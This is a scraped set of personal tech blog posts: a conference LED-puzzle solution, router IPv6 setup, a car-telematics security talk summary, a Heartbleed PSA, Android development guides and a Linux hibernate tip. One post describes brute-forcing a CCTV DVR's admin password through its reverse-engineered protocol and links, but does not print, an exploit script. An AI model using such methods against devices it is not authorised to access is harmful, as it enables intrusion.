pic.twitter.com/yJzPvxOQk9\n\u0026mdash; CircleCityCon 10.0: WHODUNIT? (@CircleCityCon) September 26, 2015 The challenge consisted of the small chest pictured above containing an eye made up of blinking red LEDs. Every 30 seconds the pattern would reset. The contest organizers hinted that we would need to record the eye at 60fps in order to capture all of the information we needed.
We ended up using a coffee creamer cup as a diffuser over the LEDs to make the difference in the pixels clearer. This resulted in the following recording. Note: we recorded 30 seconds at 60fps, which resulted in a 60 second 30fps recording.\nNext we extracted each frame from the video with the following command: (ffmpeg would have worked as well)\navconv -i VID_20150926_175956.mp4 -r 30 frames/%5d.webp\nThis resulted in the following 1800 frames.\nAfter viewing the image thumbnails we observed that the shortest amount of time the LED was either on or off was 3 frames. This means that every 3 frames represents a single bit. Since on some frames the LED was half-lit we decided to sample every 3rd frame starting in the middle of each bit to get the best representation.\n#! /usr/bin/env python import os from PIL import Image import sys def main(): i = 0 # because os.walk is not sorted, and I\u0026#39;m lazy # ls frames/* \u0026gt; frames.list for l in open(\u0026#34;frames.list\u0026#34;): i+=1 if i % 3 == 0: im = Image.open(l.strip()) # sample pixel location r,g,b = im.getpixel((1357,657)) if (r\u0026gt;250): sys.stdout.write(\u0026#39;1\u0026#39;) else: sys.stdout.write(\u0026#39;0\u0026#39;) print(\u0026#34;\u0026#34;) if __name__ == \u0026#34;__main__\u0026#34;: main() The Python script above reads every 3rd frame and prints out a 0 or 1 depending on the LED state.
This gave us the following binary string.\n0101010101111111111001100110100110100110011100101001110011100111010010011101001001101111100110110010011011111001100011100110000110011101001001100101100111010010011010001001100101100110100010011011111001110101100111001110011001011001101111100110011010011000101001100101100110000110011100101001101010100110010110011100111001110100100110010110011100101001110111100110100110011011101001110011100110000110011001101001110010100110010110011001011001100011100011001110011101001001101001100110001110011010111001100101100111010000000000000000000000000000000000000000000 Our first guess was to convert it to ASCII, however that did not return anything intelligible. Another vague hint provided got us thinking it was 10 bit serial data. A quick search on Google led us to Asynchronous Serial Communication, which after removing the first 20 bits for the header, tells us that there are 8 data bits padded by a start and a stop bit. Splitting the binary into 10 bit lines and then removing the first and last bit provided us with the following binary.\n01100110 01101001 01110010 01110011 01110100 01110100 01101111 01101100 01101111 01100011 01100001 01110100 01100101 01110100 01101000 01100101 01101000 01101111 01110101 01110011 01100101 01101111 01100110 ... Converting this to ASCII returns the following text.\nfirsttolocatethehouseofbearjesterwinsafreec3ticket After adding a few spaces it says:\nfirst to locate the house of bear jester wins a free c3 ticket\nwhich was the magic phrase to say to the house of bear to solve the challenge and win CircleCityCon tickets.\nThree worthy adventurers have solved the mystery of the Eye of Tiamat @sid_tracker @lanrat @ryatesm Congrats! pic.twitter.com/O0vMFNiCeb\n\u0026mdash; CircleCityCon 10.0: WHODUNIT? (@CircleCityCon) September 27, 2015 The puzzle was fun and simple enough to solve in a few hours allowing us to enjoy the rest of DerbyCon.
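The decoding steps above (drop the 20-bit header, split into 10-bit frames, strip the start and stop bits, read the middle 8 bits as ASCII) can be sketched in a few lines of Python (my own sketch, not the script we used at the time):

```python
def decode_serial(bits, header=20, frame=10):
    """Decode a bit string of 10-bit async serial frames into ASCII:
    skip the header, then for each frame drop the start and stop bits
    and interpret the middle 8 data bits as one character."""
    bits = bits[header:]
    chars = []
    for i in range(0, len(bits) - frame + 1, frame):
        data = bits[i + 1:i + frame - 1]  # strip start/stop bits
        chars.append(chr(int(data, 2)))
    return "".join(chars)
```

Trailing all-zero padding (as at the end of the captured stream) decodes to NUL characters and can simply be stripped.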
I would like to end by thanking CircleCityCon for creating the challenge and my teammates @SID_tracker and @ryatesm for assisting me in solving the challenge.\nAll of the data used can be found in This Gist.\n","permalink":"https://lanrat.com/posts/solving-tiamats-eye/","summary":"\u003cp\u003eLast week at \u003ca href=\"https://www.derbycon.com/\"\u003eDerbyCon 5.0\u003c/a\u003e the \u003ca href=\"https://circlecitycon.com/\"\u003eCircleCityCon\u003c/a\u003e folks had a booth with a challenge, the Challenge of Tiamat\u0026rsquo;s Eye.\u003c/p\u003e\n\u003cblockquote class=\"twitter-tweet\"\u003e\u003cp lang=\"en\" dir=\"ltr\"\u003e\u003ca href=\"https://twitter.com/CircleCityCon?ref_src=twsrc%5Etfw\"\u003e@CircleCityCon\u003c/a\u003e: Can you solve the Puzzle of Tiamat\u0026#39;s Eye?  Visit our booth at \u003ca href=\"https://twitter.com/DerbyCon?ref_src=twsrc%5Etfw\"\u003e@DerbyCon\u003c/a\u003e to take the challenge!   \u003ca href=\"http://t.co/yJzPvxOQk9\"\u003epic.twitter.com/yJzPvxOQk9\u003c/a\u003e\u003c/p\u003e\u0026mdash; CircleCityCon 10.0: WHODUNIT? (@CircleCityCon) \u003ca href=\"https://twitter.com/CircleCityCon/status/647770152772182016?ref_src=twsrc%5Etfw\"\u003eSeptember 26, 2015\u003c/a\u003e\u003c/blockquote\u003e\n\u003cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\"\u003e\u003c/script\u003e\n\n\n\u003cp\u003eThe challenge consisted of the small chest pictured above containing an eye made up of blinking red LEDs. Every 30 seconds the pattern would reset. The content organizers hinted that we would need to record the eye at 60fps in order to capture all of the information we needed. We ended up using a coffee creamer cup as a diffuser over the LEDs to make the difference in the pixels clearer. This resulted in the following recording. 
Note: we recorded 30 seconds at 60fps, which resulted in a 60 second 30fps recording.\u003c/p\u003e","title":"Solving the Challenge of Tiamat's Eye"},{"content":"Sonic (my home ISP) offers an IPv6 tunnel for their customers who have a service plan that does not offer native IPv6 yet. Sonic\u0026rsquo;s IPv6 tunnel operates much the same way Hurricane Electric\u0026rsquo;s Tunnel Broker does, however since the endpoint is located inside the ISP you should get better performance. Sonic even offers example configurations for configuring the IPv6 tunnel endpoint on various operating systems, but none for DD-WRT, a common aftermarket router firmware. Another Sonic user did document how to configure Sonic\u0026rsquo;s IPv6 tunnel with older versions of DD-WRT on the Sonic forums at dev-random.me, however the link appears to be dead. Additionally newer versions of DD-WRT have a new IPv6 tab which should allow for a painless configuration using nothing more than the web interface.\nConfiguring the Modem The first step is to put your modem into bridged mode. My modem was a Pace 5268AC. Bridged mode can be enabled by opening the modem\u0026rsquo;s configuration page at http://192.168.42.1/ and then going to Settings -\u0026gt; Broadband -\u0026gt; \u0026ldquo;Link Configuration\u0026rdquo; and at the bottom of the page deselect the check-box next to Routing and click save. You may need to reboot your router or have it renew its IP address from Sonic at this time. I initially attempted to configure an IPv6 tunnel using DMZplus, however, in this mode the modem does not forward IP protocol 41 (which is needed by the IPv6 tunnel) to the DMZ host. Additionally I found that when pinging your WAN IP over the Internet the modem would respond to the ping as well as forward the ping request to the DMZ host, resulting in duplicate ping responses.\nConfiguring Sonic The next step is to request a static IP address from Sonic if you have not done so already.
This can be done from the members portal at \u0026ldquo;Internet Connections\u0026rdquo; -\u0026gt; \u0026ldquo;Fusion IP Configuration\u0026rdquo;. After this step you will likely need to enter the new static IP setting in your router to regain connectivity. Once that is done you are ready to request an IPv6 tunnel from Labs -\u0026gt; \u0026ldquo;IPv6 Tunnels\u0026rdquo;. Then select \u0026ldquo;View/Request Tunnel\u0026rdquo; to refresh the page with your tunnel information. Remember to enter the external static IP you were assigned on the previous page. This should show you your IPv6 Transport and Network addresses and subnets. Take note of these.\nNow select \u0026ldquo;View Example Configuration\u0026rdquo;. You should now see the following 4 IP addresses: sonic-side v4 address, customer-side v4 address, Sonic-side transport IP, and customer-side transport IP.\nTake note of all 4 of these IPs, as well as the Transport and Network from the previous page.\nConfiguring your DD-WRT router Open your DD-WRT router\u0026rsquo;s configuration page (usually http://192.168.1.1) and go to Setup -\u0026gt; IPv6. If you do not have an IPv6 tab then you are likely running an older build of DD-WRT before the web interface got IPv6 support. I\u0026rsquo;m running r27506 but other builds should work just as well. From this page, first enable IPv6 and click save; this should make the page reload with all of the options. You want to use a \u0026ldquo;6in4 Static Tunnel\u0026rdquo;, with a prefix length of 60.\nStatic DNS 1 \u0026amp; 2 Sonic\u0026rsquo;s DNS servers do not have an IPv6 address (that I know of) so I used Google\u0026rsquo;s public DNS servers 2001:4860:4860::8888 and 2001:4860:4860::8844 for Static DNS 1 \u0026amp; 2.\nAssigned / Routed Prefix should be the Network subnet from the previous page without the /60 at the end. So if your network is 2001:05a8:aaaa:bbbb:0000:0000:0000:0000/60 enter 2001:05a8:aaaa:bbbb::.
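As a sanity check on that value, Python's standard ipaddress module shows how the trailing :: expands back to the full zero-padded form (using the same placeholder prefix as the example above):

```python
import ipaddress

# The example prefix from above; :: abbreviates the runs of zero bits.
addr = ipaddress.ip_address("2001:05a8:aaaa:bbbb::")
print(addr.exploded)    # full form with every zero written out
print(addr.compressed)  # canonical short form
```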
:: is not a typo; it is an abbreviation used in IPv6 address notation for a run of 0 bits.\nRouter IPv6 Address should be left blank; DD-WRT should automatically use the correct value.\nTunnel Endpoint IPv4 Address should be the \u0026ldquo;sonic-side v4 address\u0026rdquo; you took note of before. For me it was 208.201.234.221, but you may have a different value.\nTunnel Client IPv6 Address should be the \u0026ldquo;customer-side transport IP\u0026rdquo; from the Sonic example configuration page. The bitmask should be /127; however, my build of DD-WRT has maxlength=2 set on the form field. Editing the DOM directly and removing this limitation allows you to successfully enter 127.\nMTU should be set to 0 to allow DD-WRT to automatically determine the correct value.\nRadvd should be enabled.\nWhen you are done, your IPv6 configuration page should look like this:\nClick Save, then Apply, and then reboot the router. If everything is correct, DD-WRT should show an IPv6 address in the upper right corner and should offer global IPv6 addresses to computers on the network.\nFixing ICMPv6 (PING) By default DD-WRT blocks incoming IPv6 pings to the computers on your network. If you want to be able to ping individual computers on your network over the Internet, add the following firewall rule to DD-WRT under Administration -\u0026gt; Commands.\nip6tables -I FORWARD 3 -p icmpv6 --icmpv6-type echo-request -j ACCEPT After saving and applying, you should be able to ping your computer\u0026rsquo;s global IPv6 address from any other IPv6 host on the Internet.\nEnabling Modem Access The big downside of putting your modem into bridged mode is that you can no longer access its configuration page. Some people don\u0026rsquo;t care about this, but I like it as it allows me to see my current connection rate and transmission errors. Bridged mode does not mean you need to lose modem access. With another firewall rule you can regain access to the modem\u0026rsquo;s configuration page.
In DD-WRT under Administration -\u0026gt; Commands save the following line as the startup script:\nifconfig `nvram get wan_ifname`:0 192.168.42.2 netmask 255.255.255.0 And add the following line to the router\u0026rsquo;s firewall script:\niptables -t nat -I POSTROUTING -o `nvram get wan_ifname` -j MASQUERADE These rules give DD-WRT a second IP of 192.168.42.2, which allows routing to the same subnet the modem is on. After saving, applying, and rebooting, visiting http://192.168.42.1 should bring the modem\u0026rsquo;s configuration page back up. It should look something like this:\nSuccess If everything went well, you should have a fully functional IPv6 tunnel to your home network. You can verify this by using test-ipv6.com or ipv6-test.com.\n","permalink":"https://lanrat.com/posts/sonic-ipv6-tunnel-with-dd-wrt/","summary":"\u003cp\u003e\u003ca href=\"https://www.sonic.com/\"\u003eSonic\u003c/a\u003e (my home ISP) offers an IPv6 tunnel for their customers who have a service plan that does not offer native IPv6 yet. Sonic\u0026rsquo;s IPv6 tunnel operates much the same way \u003ca href=\"https://www.he.net/\"\u003eHurricane Electric\u0026rsquo;s\u003c/a\u003e \u003ca href=\"https://tunnelbroker.net/\"\u003eTunnel Broker\u003c/a\u003e does; however, since the endpoint is located inside the ISP, you should get better performance. Sonic even offers example configurations for configuring the IPv6 tunnel endpoint on various operating systems, but none for \u003ca href=\"https://www.dd-wrt.com/\"\u003eDD-WRT\u003c/a\u003e, a common aftermarket router firmware. Another Sonic user did document how to configure Sonic\u0026rsquo;s IPv6 tunnel with older versions of DD-WRT on the Sonic \u003ca href=\"https://forums.sonic.net/viewtopic.php?f=13\u0026amp;amp;t=720\"\u003eforums\u003c/a\u003e and \u003ca href=\"https://www.dev-random.me/ddwrt-ipv6-6n4-sonicnet/\"\u003eat dev-random.me\u003c/a\u003e; however, the link appears to be dead.
Additionally newer versions of DD-WRT have a new IPv6 tab which should allow for a painless configuration using nothing more than the web interface.\u003c/p\u003e","title":"Sonic IPv6 Tunnel with DD-WRT"},{"content":"I gave a presentation at WOOT 2015 demonstrating how network enabled telematic control units (TCUs) can be used to remotely control automobiles from arbitrary distance over SMS or the Internet.\nAbstract Modern automobiles are complex distributed systems in which virtually all functionality, from acceleration and braking to lighting and HVAC, is mediated by computerized controllers. The interconnected nature of these systems raises obvious security concerns and prior work has demonstrated that a vulnerability in any single component may provide the means to compromise the system as a whole. Thus, the addition of new components, and especially new components with external networking capability, creates risks that must be carefully considered.\nIn this paper we examine a popular aftermarket telematics control unit (TCU) which connects to a vehicle via the standard OBD-II port. We show that these devices can be discovered, targeted, and compromised by a remote attacker and we demonstrate that such a compromise allows arbitrary remote control of the vehicle. This problem is particularly challenging because, since this is aftermarket equipment, it cannot be well addressed by automobile manufacturers themselves.\nYou can read the full paper.\nUpdate I also gave this talk at ToorCon 2015! 
See the full talk recording below!\nToorCon 2015 Talk Demo Video CVEs CVE-2015-2906 CVE-2015-2907 CVE-2015-2908 Vulnerability Note: VU#209512\nPress WIRED: Hackers Cut a Corvette\u0026rsquo;s Brakes Via a Common Car Gadget KPBS: Car Hacking Research Accelerates At UC San Diego Engadget: Hackers control connected cars using text messages The Verge: Researchers wirelessly hack a Corvette\u0026rsquo;s brakes using an insurance dongle Business Insider: Hackers have figured out how to take over the brakes in some cars with a simple text message Gizmodo: Small Wireless Car Devices Allow Hackers to Take Control of a Vehicle\u0026rsquo;s Brakes ","permalink":"https://lanrat.com/posts/fast-and-vulnerable/","summary":"\u003cp\u003eI gave a presentation at \u003ca href=\"https://www.usenix.org/conference/woot15/workshop-program/presentation/foster\"\u003eWOOT 2015\u003c/a\u003e demonstrating how network enabled telematic control units (TCUs) can be used to remotely control automobiles from arbitrary distance over SMS or the Internet.\u003c/p\u003e\n\u003ch2 id=\"abstract\"\u003eAbstract\u003c/h2\u003e\n\u003cp\u003eModern automobiles are complex distributed systems in which virtually all functionality, from acceleration and braking to lighting and HVAC, is mediated by computerized controllers. The interconnected nature of these systems raises obvious security concerns and prior work has demonstrated that a vulnerability in any single component may provide the means to compromise the system as a whole. Thus, the addition of new components, and especially new components with external networking capability, creates risks that must be carefully considered.\u003c/p\u003e","title":"Fast and Vulnerable: A Story of Telematic Failures"},{"content":"Recently there has been a lot of buzz about the recent Heartbleed vulnerability found in some versions of OpenSSL. The attack works due to a mistake in the server validating part of the request made by the SSL client. 
The popular web comic XKCD has made a great simple comic explaining how the attack works, and there are simple tools to test for vulnerable servers.\nBut how does this affect me, a user?\nWell, if any of the services you used were vulnerable, you should at least change your password. Ideally the administrators of the service are aware of this attack and have fixed the issue on their end, and hopefully revoked their previous SSL certificate and issued a new one. If they have not, then you should really consider moving your data elsewhere.\nFor the web, most web browsers will automatically check for revoked certificates and warn the user if they try to visit a site that is using a certificate that has been revoked. However, Google Chrome, currently the most popular web browser, does not check if a server\u0026rsquo;s certificate has been revoked by default. Safari, Firefox, and even Internet Explorer do perform this check by default. But don\u0026rsquo;t worry, CRL (certificate revocation list) checking can be enabled!\nTo enable CRL checking in Chrome enter chrome://settings into the address bar and press enter. Once on the settings page, enter \u0026ldquo;ssl\u0026rdquo; into the search box. Finally check the box next to \u0026ldquo;Check for server certificate revocation\u0026rdquo;. That\u0026rsquo;s all!\nTo verify that certificate revocation checking works, you can visit https://www.cloudflarechallenge.com. If the page loads then your browser is not checking for revoked certs. If you see an error, then your browser noticed that the certificate being used on the server has been revoked and is doing its job.\nMore information about how the Heartbleed attack affects certificates can be found in this CloudFlare blog post.\nUpdate Enabling CRL checking is good, but it is not a full solution. 
CRL does not work on large scales, to learn more read this.\n","permalink":"https://lanrat.com/posts/enable-server-certificate-revocation-checking-in-chrome/","summary":"\u003cp\u003eRecently there has been a lot of buzz about the recent \u003ca href=\"https://heartbleed.com/\"\u003eHeartbleed\u003c/a\u003e vulnerability found in some versions of OpenSSL. The attack works due to a mistake in the server validating part of the request made by the SSL client. The popular web comic XKCD has made a great simple comic \u003ca href=\"https://xkcd.com/1354/\"\u003eexplaining how the attack works\u003c/a\u003e, and there are \u003ca href=\"https://filippo.io/Heartbleed/\"\u003esimple tools\u003c/a\u003e to test for vulnerable servers.\u003c/p\u003e\n\u003cp\u003eBut how does this affect me, a user?\u003c/p\u003e","title":"PSA: Enable server certificate revocation checking in Chrome"},{"content":"At an internship I had a while ago one project assigned to me was to regain access to a CCTV security system which we had been locked out of for some years. (The previous manager left without leaving the password.)\nThe DVR system was a TRIPLEX DVRLink DVR468RW, whatever that is. It seemed cheap; a small embedded computer with video in/out, a hard-drive and CD-RW drive for recording storage. The administration interface was accessed either by a web server running on the device or a desktop client you installed on your computer.\nMy initial thought was to remove the device\u0026rsquo;s internal clock battery to reset the password back to the default of \u0026ldquo;1234\u0026rdquo;, no dice. Next on the list of things to try was examining the hard-drive in a desktop computer to see if the password could be viewed or reset. The hard drive had a single partition with some old surveillance video footage; nothing to do with settings or authentication. 
Further examination of the main board revealed a flash memory chip which I assumed stored the device\u0026rsquo;s configuration, including the administration password.\nLet me step back here… The administration password could be entered either over one of the remote management interfaces (the desktop client or web server) or physically on the device\u0026rsquo;s keypad. The keypad had the buttons: [1], [2], [3], [4] and [ENTER]. Well isn\u0026rsquo;t that interesting; it looks as if the password can only be made up of those 4 characters. And the desktop client nicely informs me that when entering a password it must be between 4 and 8 characters long; that leaves only 87,296 possibilities.\nSo, onto the next attack! Knowing that this device had such a limited number of possible passwords, a brute-force attack wouldn\u0026rsquo;t be bad at all. After spending a lot of time examining unsuccessful login attempts from the desktop client in Wireshark and understanding their proprietary protocol, I wrote my first useful python script to automate the process. After a few false positives and tweaks, I was able to get the program to generate a list of every possible password combination for the device and try them out. Within a minute of running, I had the device\u0026rsquo;s long-lost administration password of \u0026ldquo;1324\u0026rdquo; (it has since been changed).\nAfter logging in as the Administrator, I was able to see that there were other accounts on the system as well. And my program worked equally well for all of them. However, it is currently hard-coded to use the Administrator username. You may change it if you wish, but why bother? 😉\nAttached to this post is both the exploit and manual for the TRIPLEX DVRLink DVR468RW. I hope that either may be useful to someone.
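The 87,296 figure is easy to verify: passwords are 4 to 8 characters long, each character drawn from the 4 digit keys. A quick counting sketch (this is not the original exploit script, just the arithmetic and candidate generation):

```python
from itertools import product

KEYS = "1234"            # the only buttons usable in a password
MIN_LEN, MAX_LEN = 4, 8  # length limits enforced by the desktop client

# Search-space size: 4^4 + 4^5 + 4^6 + 4^7 + 4^8 = 87,296
total = sum(len(KEYS) ** n for n in range(MIN_LEN, MAX_LEN + 1))
print(total)  # 87296

# The same space as a lazy stream of candidates for a brute-force loop:
def candidates():
    for n in range(MIN_LEN, MAX_LEN + 1):
        for combo in product(KEYS, repeat=n):
            yield "".join(combo)

first = next(candidates())
print(first)  # 1111
```

Trying every candidate against the device is then a single loop over candidates().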
(In a law-abiding way)\nDVR_exploit.py (Developed and tested with Python 3 running on Windows XP)\nThis article has been published in 2600 Magazine issue Spring 2013; Volume 30, Number one!\n","permalink":"https://lanrat.com/posts/triplex-dvrlink-dvr468rw-exploit/","summary":"\u003cp\u003eAt an internship I had a while ago one project assigned to me was to regain access to a CCTV security system which we had been locked out of for some years. (The previous manager left without leaving the password.)\u003c/p\u003e\n\u003cp\u003eThe DVR system was a TRIPLEX DVRLink DVR468RW, whatever that is. It seemed cheap; a small embedded computer with video in/out, a hard-drive and CD-RW drive for recording storage. The administration interface was accessed either by a web server running on the device or a desktop client you installed on your computer.\u003c/p\u003e","title":"TRIPLEX DVRLink DVR468RW Exploit"},{"content":" Update ActionBarSherlock is no longer necessary. The latest Google Support Library includes appcompat which is a better solution.\nActionBarSherlock is an Android support library designed to allow you to use the ActionBar, which was introduced in Android 3.0 Honeycomb, with older devices back to Android 2.1 Eclair. This allows your applications to have a modern-looking interface, even on older devices whose API does not support the new features.\nTo get started using ActionBarSherlock in Eclipse, follow these steps.\nDownload ActionBarSherlock Visit http://actionbarsherlock.com to download and extract the latest version to a development directory. You will be including this directory as a library in your app.\nIn Eclipse choose File -\u0026gt; New -\u0026gt; Other and select \u0026ldquo;Android Project from Existing Code\u0026rdquo;. Select the \u0026ldquo;actionbarsherlock\u0026rdquo; folder within the directory of the zip file you just extracted.
Eclipse should detect the project and import it into your workspace.\nCreate a New Application If you are going to add the ActionBar to an existing application, skip this step.\nCreate a new Android application. I recommend the lowest minimum SDK you can use for your application (no lower than API 7). And set the target SDK to the highest version you can support (ideally the newest Android version). Finish the rest of the new application wizard so that Eclipse shows you your newly created application.\nAdding ActionBarSherlock to the Application Right-click the application project and select properties. Then in the Android section under Library select Add and choose actionbarsherlock. Select Apply and then OK.\nIf you get the error: Found 2 versions of android-support-v4.jar in the dependency list in the console output, then delete android-support-v4.jar in your project\u0026rsquo;s libs directory.\nIn AndroidManifest.xml add the attribute android:theme=\u0026quot;@style/Theme.Sherlock\u0026quot; to the Application section. There is also Theme.Sherlock.Light, Theme.Sherlock.Light.DarkActionBar, Theme.Sherlock.Light.NoActionBar and Theme.Sherlock.NoActionBar.\nNow you need to update each Activity that you want the ActionBar to appear on. In each Activity import com.actionbarsherlock.app.SherlockActivity and remove the import for android.app.Activity. Change the class to extend SherlockActivity instead of Activity.\nThe ActionBar can also replace application menus. To use the ActionBar for menus import com.actionbarsherlock.view.Menu and com.actionbarsherlock.view.MenuItem. And remove the imports for android.view.Menu, android.view.MenuInflater, and android.view.MenuItem. Inside onCreateOptionsMenu() replace getMenuInflater() with getSupportMenuInflater().\nYou will use an XML menu resource to define the ActionBar menu items just like you did for older Android menus; however, items have some new options. Most importantly android:showAsAction.
This defines whether the menu item is allowed to be shown on the dropdown menu if all the icons don\u0026rsquo;t fit on the action bar. It also allows you to display just the item\u0026rsquo;s icon, or display its title. Below is a sample ActionBar menu I use on WiFi Key Recovery.\n\u0026lt; ?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;utf-8\u0026#34;?\u0026gt; \u0026lt;menu xmlns:android=\u0026#34;http://schemas.android.com/apk/res/android\u0026#34;\u0026gt; \u0026lt;item android:id=\u0026#34;@+id/menu_backup\u0026#34; android:icon=\u0026#34;@drawable/ic_action_save\u0026#34; android:title=\u0026#34;@string/menu_backup\u0026#34; android:showAsAction=\u0026#34;always|withText\u0026#34;\u0026gt;\u0026lt;/item\u0026gt; \u0026lt;item android:id=\u0026#34;@+id/menu_refresh\u0026#34; android:title=\u0026#34;@string/menu_refresh\u0026#34; android:icon=\u0026#34;@drawable/ic_action_refresh\u0026#34; android:showAsAction=\u0026#34;ifRoom\u0026#34;\u0026gt;\u0026lt;/item\u0026gt; \u0026lt;item android:id=\u0026#34;@+id/menu_about\u0026#34; android:title=\u0026#34;@string/menu_about\u0026#34; android:icon=\u0026#34;@drawable/ic_action_about\u0026#34; android:showAsAction=\u0026#34;ifRoom\u0026#34;\u0026gt;\u0026lt;/item\u0026gt; \u0026lt;item android:id=\u0026#34;@+id/menu_settings\u0026#34; android:icon=\u0026#34;@drawable/ic_action_settings\u0026#34; android:title=\u0026#34;@string/menu_wifi_settings\u0026#34; android:showAsAction=\u0026#34;ifRoom\u0026#34;\u0026gt;\u0026lt;/item\u0026gt; \u0026lt;/menu\u0026gt; Bugs Sometimes the android-support-v4.jar included in ActionBarSherlock may cause problems when using some of the newer API calls. I\u0026rsquo;ve noticed this when creating notifications with multiple actions. To fix this copy android-support-v13.jar from your Android SDK folder into ActionBarSherlock\u0026rsquo;s or your project\u0026rsquo;s libs folder. It will detect both versions of the support library and use the newest one. 
You should only need to do this last step if this is causing issues, as ActionBarSherlock will likely be updated to fix this in a future release.\n","permalink":"https://lanrat.com/posts/getting-started-with-actionbarsherlock/","summary":"\u003clink rel=\"stylesheet\" href=\"/css/vendors/admonitions.53cd9f8afa9d9a8ac09093f668df057bc6d0f4bbd0886f39991a7b99934a7432.css\" integrity=\"sha256-U82fivqdmorAkJP2aN8Fe8bQ9LvQiG85mRp7mZNKdDI=\" crossorigin=\"anonymous\"\u003e\n    \u003cdiv class=\"admonition info\"\u003e\n      \u003cdiv class=\"admonition-header\"\u003e\u003csvg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 512 512\"\u003e\u003cpath d=\"M256 512A256 256 0 1 0 256 0a256 256 0 1 0 0 512zM216 336l24 0 0-64-24 0c-13.3 0-24-10.7-24-24s10.7-24 24-24l48 0c13.3 0 24 10.7 24 24l0 88 8 0c13.3 0 24 10.7 24 24s-10.7 24-24 24l-80 0c-13.3 0-24-10.7-24-24s10.7-24 24-24zm40-208a32 32 0 1 1 0 64 32 32 0 1 1 0-64z\"/\u003e\u003c/svg\u003e\n        \u003cspan\u003eUpdate\u003c/span\u003e\n      \u003c/div\u003e\n      \u003cdiv class=\"admonition-content\"\u003e\n        \u003cp\u003eActionBarSherlock is no longer necessary. The latest Google Support Library includes \u003ca href=\"https://developer.android.com/topic/libraries/support-library/features.html\"\u003eappcompat\u003c/a\u003e which is a better solution.\u003c/p\u003e","title":"Getting Started with ActionBarSherlock"},{"content":"A while ago I was working on building a custom kernel for my Android phone. Once you get the source, the compilation process is not as straightforward as I hoped. Here are the steps required to get from the kernel source to a flashable image for your phone.\nGet a copy of the build toolchain and Linux kernel for your device First download a copy of the pre-built toolchain from git.\ngit clone https://android.googlesource.com/platform/prebuilts/gcc/linux-x86/arm/arm-eabi-4.6 Then locate a copy of a kernel for your device.
I used the CyanogenMod kernel for the tuna device, which is the code-name for the hardware of the Galaxy Nexus. Alternatively, you can get a kernel from the Android source website.\nDownload the kernel with git:\ngit clone https://github.com/CyanogenMod/android_kernel_samsung_tuna.git Build the kernel configuration file Change into the root directory of the kernel you just downloaded and run the following code:\nexport ARCH=arm export SUBARCH=arm export CROSS_COMPILE=/home/user/git/arm-eabi-4.6/bin/arm-eabi- make DEVICE_defconfig Replace the CROSS_COMPILE path with the path to where you cloned the toolchain repository and replace DEVICE_defconfig with the configuration name for the device you are using; I used tuna_defconfig. If you are using CyanogenMod then use cyanogenmod_DEVICE_defconfig. This will create a .config file with all the settings to compile the kernel with. You can edit the file with a text editor or run the following if you want to use a terminal GUI.\nmake menuconfig Compiling the kernel Now the kernel is ready to be compiled. To start the compilation process run:\nmake -j 4 -j 4 tells the compiler how many of your processor\u0026rsquo;s cores to use for the compilation process. Since I have a quad-core processor I used 4, but you should change it to match your system. If you are unsure of what to use, use make with no options. This may take some time depending on the speed of your system; it took 20 minutes for me.\nOnce it is done, if there are any kernel modules you want compiled for this kernel, run:\nmake modules If everything went well and you got no errors, then your kernel will be located at arch/arm/boot/zImage\nInstalling the Kernel In order to turn the zImage file into a flashable image for an Android device you can use koush\u0026rsquo;s AnyKernel utility.\nClone the AnyKernel repository and replace kernel/zImage with the one you just created.
Also remove everything from the system directory and replace it with any kernel modules you created. NOTE: Some devices may require a modified version of AnyKernel to work. The Galaxy Nexus should use the AnyKernel from the Galaxy Nexus Project. If you are not using any special kernel modules then you can skip line 5. Otherwise, the output of \u0026ldquo;make modules\u0026rdquo; should tell you where to copy the modules from.\ngit clone https://github.com/Galaxy-Nexus-Project/AnyKernel.git cd AnyKernel cp ../android_kernel_samsung_tuna/arch/arm/boot/zImage kernel/zImage rm system/lib/modules/* cp PATH_TO_COMPILED_MODULES system/lib/modules/ zip -r9 newKernel.zip * The newKernel.zip you just created should now install your new kernel and modules on your device. Note: if your recovery requires zips to be signed then you will need to sign it before it will work.\n","permalink":"https://lanrat.com/posts/how-to-compile-a-linux-kernel-for-android/","summary":"\u003cp\u003eA while ago I was working on building a custom kernel for my Android phone. Once you get the source, the compilation process is not as straightforward as I hoped. Here are the steps required to get from the kernel source to a flashable image for your phone.\u003c/p\u003e\n\u003ch2 id=\"get-a-copy-of-the-build-toolchain-and-linux-kernel-for-your-device\"\u003eGet a copy of the build toolchain and Linux kernel for your device\u003c/h2\u003e\n\u003cp\u003eFirst download a copy of the pre-built toolchain from git.\u003c/p\u003e","title":"How to Compile a Linux Kernel for Android"},{"content":"\nBy default CrunchBang Linux does not have hibernation support enabled in the shutdown menu. The reason for being excluded is likely because not all computers support hibernation.
However most modern computers will support it.\nTo add a hibernation option just download this file and place it in the bin directory of your home folder: \u0026ldquo;~/bin/\u0026rdquo; and make it executable with:\nchmod +x cb-exit cb-exit Gist\nIf you want to test your system to see if it can handle hibernation run the following command. If your system supports it you should be able to successfully enter and exit hibernation:\ndbus-send --system --print-reply --dest=\\\u0026#34;org.freedesktop.UPower\\\u0026#34; /org/freedesktop/UPower org.freedesktop.UPower.Hibernate ","permalink":"https://lanrat.com/posts/adding-hibernate-to-crunchbang/","summary":"\u003cp\u003e\u003cimg alt=\"cb-exit\" loading=\"lazy\" src=\"/posts/adding-hibernate-to-crunchbang/images/cb-exit.webp\"\u003e\u003c/p\u003e\n\u003cp\u003eBy default \u003ca href=\"https://crunchbang.org/\"\u003eCrunchBang Linux\u003c/a\u003e does not have hibernation support enabled in the shutdown menu. The reason for being excluded is likely because not all computers support hibernation. 
